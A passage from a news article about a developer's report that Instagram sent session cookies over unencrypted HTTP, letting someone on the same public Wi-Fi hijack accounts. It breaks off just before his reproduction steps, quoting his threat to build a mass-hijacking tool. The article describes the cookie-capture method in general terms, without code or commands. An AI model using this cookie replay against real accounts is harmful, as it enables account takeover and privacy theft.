Stevie Graham, a London-based developer, recently submitted a bug report to Facebook outlining what he saw as a security vulnerability in Instagram that would allow someone to hijack a user’s session based on data captured over a public Wi-Fi network. When he was told that he wouldn’t get a bug bounty from Facebook, which owns Instagram, he tweeted about it—and set about building a proof-of-concept tool to exploit it. “Denied bug bounty. Next step is to write automated tool enabling mass hijacking of accounts,” he wrote. “Pretty serious vuln, FB. please fix.”
As we reported in our recent coverage of mobile application privacy holes, Instagram uses HTTP for much of its communications, passing the user’s account name and an identifying account number in the clear. And as Graham demonstrated, there are other pieces of data sent between Instagram’s iOS client and the service that are passed in the clear. Even though the user’s credentials are submitted using a secure connection, information passed back by Instagram’s application interface to the phone client provides a cookie that can be used on the same network without reauthentication to connect via the Web to Instagram as that user and gain access to private messages and other data. “Once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP,” he wrote. Graham said that he has known about the flaw for years.
Graham posted the following steps to reproduce his findings: